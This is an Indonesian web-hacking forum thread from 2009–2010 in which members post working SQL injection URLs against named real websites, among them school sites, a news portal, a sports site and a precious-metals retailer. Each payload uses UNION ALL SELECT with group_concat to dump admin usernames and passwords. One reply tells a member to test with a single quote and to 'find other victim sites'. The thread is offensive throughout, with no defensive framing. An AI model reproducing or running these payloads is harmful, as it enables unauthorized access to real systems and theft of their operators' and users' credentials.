bug site post di sini

Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
Post Reply
User avatar
vodork
Posts: 191
Joined: Wed Jun 10, 2009 1:52 am
Location: jogja/sarkem
Contact:
Contact vodork

bug site post di sini

Post by vodork » Fri Jul 17, 2009 2:14 pm

udah lulus SMA eh dapet web sekolah

Code: Select all

http://www.sman1karangnongko-klt.sch.id/berita.php?ID=-31+union+all+select+1,2,3,group_concat(fs_id,0x3a,fs_password,0x3a,fs_kat),5,6,7,8,9,10+from+t_admin--

Code: Select all

http://sman10-smg.sch.id/?v=nw&id=-56+union+all+select+1,2,3,4,5,group_concat(NAME,0x3a,USERNAME,0x3a,PASSWORD),7,8,9,10+FROM+admin--
monggo yang lain..... :D :D
Last edited by vodork on Fri Jul 17, 2009 2:25 pm, edited 2 times in total.
.::[tresno jalaran saking kulino]::.

.::[nek wes kullino]::.

.::[karepmu]::.
Top
User avatar
wiLMaR_kiDz
Posts: 964
Joined: Fri Mar 27, 2009 1:03 pm
Location: internet
Contact:
Contact wiLMaR_kiDz

Re: bug site post di sini

Post by wiLMaR_kiDz » Fri Jul 17, 2009 2:17 pm

busset dahh...hehehee.... :mrgreen: :mrgreen:
regards,
ordinary user,-
Top
User avatar
vodork
Posts: 191
Joined: Wed Jun 10, 2009 1:52 am
Location: jogja/sarkem
Contact:
Contact vodork

Re: bug site post di sini

Post by vodork » Wed Jul 22, 2009 1:52 am

Code: Select all

http://tifozatkuqezi.net/sporti-lajme.php?id=-3274+union+all+select+1,2,3,4,5,group_concat(id,0x3a,emniplote,0x3a,emni,0x3a,websajt,0x3a,shteti,0x3a,qyteti,0x3a,emaili,0x3a,statusi),7,8,9,10,11,12+FROM+tkz_admin--
aduh mumet tau tuh bahasa apa'n :D :D
.::[tresno jalaran saking kulino]::.

.::[nek wes kullino]::.

.::[karepmu]::.
Top
User avatar
roandica
Posts: 8
Joined: Wed Mar 12, 2008 10:58 pm
Contact:
Contact roandica

Re: bug site post di sini

Post by roandica » Fri Jul 24, 2009 7:14 pm

http://www.charlespoliquin.com/News/new ... sql.user--

kiranya berkenan pada kk2 master disini

salam dari dd_newbie ini

Peace Indonesiaku
Image
Top
blackxnovo
Posts: 20
Joined: Fri Jan 15, 2010 2:43 am
Location: anywhere

Re: bug site post di sini

Post by blackxnovo » Fri Jan 15, 2010 9:03 am

Code: Select all

http://www.ambonekspres.com/index.php?act=rubrik&catid=-9+UNION+ALL+SELECT+1,2,concat_ws(0x3a,User,Password),4,5,6,7,8+from+user--
Last edited by blackxnovo on Fri Jan 15, 2010 9:11 am, edited 1 time in total.
Jong Ambonese
Top
blackxnovo
Posts: 20
Joined: Fri Jan 15, 2010 2:43 am
Location: anywhere

Re: bug site post di sini

Post by blackxnovo » Fri Jan 15, 2010 11:23 am

:gebrak: :devil :malumalu:

Code: Select all

http://wmc-iainws.com/detail_news.php?id=-22+UNION+ALL+SELECT+1,2,3,GROUP_CONCAT(user_member,password),5,6,7,8,9,10,11,12,13,14+FROM+t_member--
Jong Ambonese
Top
blackxnovo
Posts: 20
Joined: Fri Jan 15, 2010 2:43 am
Location: anywhere

Re: bug site post di sini

Post by blackxnovo » Fri Jan 15, 2010 11:40 am

untuk encrypt md5 liat di halamannya mas poni:

Code: Select all

http://xcode.or.id/forum/viewtopic.php?f=125&t=35178
Jong Ambonese
Top
User avatar
peniru
Posts: 389
Joined: Fri Jan 25, 2008 9:12 am
Location: makassar
Contact:
Contact peniru

Re: bug site post di sini

Post by peniru » Fri Jan 15, 2010 12:40 pm

ni ada bugna.. tapi kalo q union kok malah katanya connection interupted... :circle:
apa mang ni site gk bisa di inject??

http://www.logammulia.com/news.php?id=- ... ,2,3,4,5--
.::. My Sign .::.
..noobie Pool..
Pake tools ato tidak bukan masalah yang penting bisa mengerti apa yang dilakukan
[url]karma37.wordpress.com[/url]
[url]koleksiomel.blogspot.co.id[/url]
Top
blackxnovo
Posts: 20
Joined: Fri Jan 15, 2010 2:43 am
Location: anywhere

Re: bug site post di sini

Post by blackxnovo » Fri Jan 15, 2010 12:45 pm

:ngakak:

Code: Select all

http://www.pudak-scientific.com/detail_news.php?id=-12+UNION+ALL+SELECT+1,2,3,GROUP_CONCAT(0x2b,user_id,0x2b,password),5+FROM+user_id--
Jong Ambonese
Top
blackxnovo
Posts: 20
Joined: Fri Jan 15, 2010 2:43 am
Location: anywhere

Re: bug site post di sini

Post by blackxnovo » Sun Jan 17, 2010 2:19 pm

peniru wrote:ni ada bugna.. tapi kalo q union kok malah katanya connection interupted... :circle:
apa mang ni site gk bisa di inject??

http://www.logammulia.com/news.php?id=- ... ,2,3,4,5--
kykx ntuh site gak bisa diinject bro :)

Code: Select all

http://www.logammulia.com/news.php?id=9'
karena kalo dipake tanda kutip satu di akhir alamatx gak tampil mysql error. Seandainya kalo ada errorx, bisa diinject. Met berjuang, nyari site korban yg lainnya, sambil dengerin lagunya d-masiv "Jangan pernah menyerah".

LOL
Jong Ambonese
Top
Post Reply

Return to “Web Hacking”